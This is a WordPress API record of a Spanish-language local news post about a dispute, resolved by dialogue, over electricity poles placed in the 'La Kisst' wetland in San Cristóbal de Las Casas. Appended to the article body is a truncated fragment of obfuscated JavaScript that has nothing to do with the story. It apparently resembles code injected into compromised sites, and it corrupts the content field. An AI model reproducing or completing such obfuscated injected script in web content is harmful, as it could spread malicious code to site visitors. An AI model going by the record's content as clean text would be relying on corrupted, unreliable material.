{"id":23078,"date":"2025-07-21T05:13:04","date_gmt":"2025-07-21T05:13:04","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=23078"},"modified":"2025-07-21T05:13:04","modified_gmt":"2025-07-21T05:13:04","slug":"aclaran-malentendido-por-instalacion-de-postes-en-zona-de-humedal-en-san-cristobal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=23078","title":{"rendered":"Aclaran malentendido por instalaci\u00f3n de postes en zona de humedal en San Crist\u00f3bal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"625\" height=\"542\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000233249.jpg\" alt=\"\" class=\"wp-image-23079\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000233249.jpg 625w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/07\/1000233249-300x260.jpg 300w\" sizes=\"auto, (max-width: 625px) 100vw, 625px\" \/><\/figure>\n\n\n\n<p>Yolanda Rodr\u00edguez\/ corresponsal<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas, 20 de julio de 2025.\u2013 La ma\u00f1ana de este domingo se gener\u00f3 un malentendido en la colonia 5 de Marzo, luego del inicio de un proyecto de electrificaci\u00f3n que incluy\u00f3 la colocaci\u00f3n de postes en una zona correspondiente al pol\u00edgono del humedal \u201cLa Kisst\u201d. Esta situaci\u00f3n caus\u00f3 inquietud entre habitantes y representantes ambientales, debido a la importancia ecol\u00f3gica del \u00e1rea.<\/p>\n\n\n\n<p>Gracias a un di\u00e1logo ameno entre los involucrados, se logr\u00f3 aclarar la situaci\u00f3n y resolver el conflicto de manera pac\u00edfica. Se acord\u00f3 establecer una mesa de trabajo para revisar los procedimientos y evitar futuras afectaciones en zonas protegidas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Yolanda Rodr\u00edguez\/ corresponsal San Crist\u00f3bal de Las Casas, 20 de julio de 2025.\u2013 La ma\u00f1ana de este domingo se gener\u00f3 un malentendido en la colonia 5 de Marzo, luego del inicio de un proyecto de electrificaci\u00f3n que incluy\u00f3 la colocaci\u00f3n de postes en una zona correspondiente al pol\u00edgono del humedal \u201cLa Kisst\u201d. Esta situaci\u00f3n caus\u00f3 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":23079,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-23078","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23078","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=23078"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23078\/revisions"}],"predecessor-version":[{"id":23080,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23078\/revisions\/23080"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/23079"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=23078"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=23078"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=23078"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}